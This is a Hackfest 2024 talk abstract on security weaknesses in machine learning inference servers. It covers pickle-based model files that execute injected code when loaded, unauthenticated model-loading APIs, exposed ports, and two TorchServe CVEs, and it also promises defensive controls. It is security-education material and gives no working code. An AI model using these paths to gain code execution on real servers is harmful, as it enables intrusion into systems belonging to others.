Inference Servers: new technology, same old security flaws. :: Hackfest 2024

Inference Servers: new technology, same old security flaws.
.ical

10-12, 14:30–15:20 (America/New_York), Track 2 (206a)
Language: English

AI and LLM based applications are taking the industry by storm. While a lot time is spent on evaluating prompt injection there is an entire ecosystem of applications that allow models to be run and used. These applications have their own security considerations that you should be aware of.

Inference Servers are used to host machine learning models and expose APIs that allow other components to perform inference on those models. These servers often expose additional APIs that allow users to load new models into them, which can be abused to perform remote code execution. While this technology is new, the baseline security configurations for many of these products are a relic from the past.

In this talk I will talk about what an inference server is, how they work, and explain how you can achieve remote code execution in them. This talk will be more focused on practical security risks involved in this ecosystem. I will also share the details for a couple of CVEs related to TorchServe.

Introduction:

● An overview of what Machine Learning (ML) models are, conceptually

● Reasons why a company would integrate an ML model

○ How the concept of ML models and their uses compares to using a Large Language Model (LLM) on OpenAI

● A discussion on how you should approach ML models as a security professional

○ ML models are in a lot of ways conceptually the same binary files that can be executed with an interpreter (e.g. PyTorch, TensorFlow, etc.).

In the introduction section I will provide an overview of what a machine learning model is. Rather than explaining from the perspective of a math PhD (as is often the case with ML articles), I will explain from the perspective of a security professional who is evaluating one of these models.

ML models have a vast array of uses. They can be very complex, generating arbitrary text as is the case with LLMs. Alternatively, ML models can be very simple and perform a trivial evaluation of a graph. Regardless of complexity, any ML model is essentially a binary file which is executed by an ML framework such as PyTorch or TensorFlow. The models are loaded by the framework and then provided with input to perform “inference” on and obtain a prediction.

How are models used?:

• Users can train their own models, but it is more common to obtain a pre-trained model from a source like HuggingFace due to the intensive resource cost of training a model,

• Once users identify what models they want to use, they download the model files and then load them. Lack of validation on models from untrusted sources is a major contributor to supply chain risk.

• Models can be loaded directly via the framework that made them (e.g. in the case of PyTorch, using torch.load()) or by using a library like Transformers from HuggingFace (which just uses the same backend framework itself).

• Once a model has been loaded it can be used to perform inference; inference is the act of sending data to the model and obtaining a prediction back.

Dangerous File Formats:

There are two types of commonly used model files, PyTorch models and Tensorflow H5 files, that are stored in dangerous file formats. PyTorch is the most common ML model library and by default the file format that it uses is insecure as it is a Python Pickle.

Pickle files are serialized objects that are deserialized with functions such as “torch.load()”. If code is injected into the Pickle file, the deserialization process will cause that code to execute. The remote code execution risk here is very straight forward: if a user attempts to load a malicious Python Pickle with “torch.load()”, it will execute the injected code.

I will demonstrate how this execution happens in the context of an inference server in the following sections.

Inference Servers:

An inference server is a type of software which is used by an organization to host models and expose them to inference. While it is possible to load a model locally, it is not efficient to do so if a given model has multiple consumers. One parallel to draw is that of a server software like Apache Tomcat. One Tomcat server is used to expose backend APIs that may be used by multiple frontend hosts.

Inference servers are all relatively new. Two of the biggest ones are Triton by Nvidia (https://developer.nvidia.com/triton-inference-server) and TorchServe by PyTorch (https://github.com/pytorch/serve).

Despite being new technology, some of these servers have a lot of insecure baseline configurations which are reminiscent of an earlier era of security.

Authentication:

● By default, most inference servers do not support authentication on any APIs.

○ Recent changes have implemented authentication, but often as an optional parameter.

● In many cases, developers may choose not to implement authentication as it creates a performance overhead.

Code Execution

● Inference servers expose APIs that not only allow users to perform inference, but to load new models.

● In the context of these servers, loading a new model is in effect code execution.

● If a provided model file contains a model type that can execute code (such as a PyTorch model), the server will execute it when loading the model for inference.

● It is also possible to provide a handler file to these servers; these are files that are generally used for things like tokenization and can be raw python files which can be used for code execution.
Port Exposure

● Inference servers expose multiple ports by default, usually API interfaces for both HTTP and gRPC.

● In some cases, exposed ports are not bound to localhost by default.

TorchServe:

TorchServe is one of the major types of inference servers that exist out in the market. During research, we came across two issues which we will discuss here.

• CVE-2024-35199 - By default, TorchServe exposed gRPC ports to 0.0.0.0 which allowed a user to submit a model (which in-turn is code execution).

• CVE-2024-35198 – TorchServe has a security control which limits the location from where model files can be loaded in the filesystem; this CVE discusses a bypass of that control.

We will also walk through examples of a few different ways you could exploit an exposed TorchServe server to obtain code execution.

Depending on timing, we can also discuss how TorchServe workers operate and how an attacker who is locally present on a system (i.e. by executing code in a malicious Pickle) can try to target them.

Security Controls for Inference Servers:

● We will discuss some settings and options you can set to enable authentication and prevent arbitrary loading of models.

● We will also discuss how to safely load models with safer file formats or more restrictive loading options.

For the conclusion, I will discuss what security controls and configurations to look for, or recommend, when reviewing the security configuration for an inference server.

Are you releasing a tool? – no

Pratik Amin

My name is Pratik Amin and I have been working in Application Security for about 15 years now. I am a Principal Security Consultant at Kroll (previously Security Compass). I've spent a lot of that time doing AppSec pentests and digging into interesting technology.

Inference Servers: new technology, same old security flaws. .ical 10-12, 14:30–15:20 (America/New_York), Track 2 (206a) Language: English

Inference Servers: new technology, same old security flaws.
.ical

10-12, 14:30–15:20 (America/New_York), Track 2 (206a)
Language: English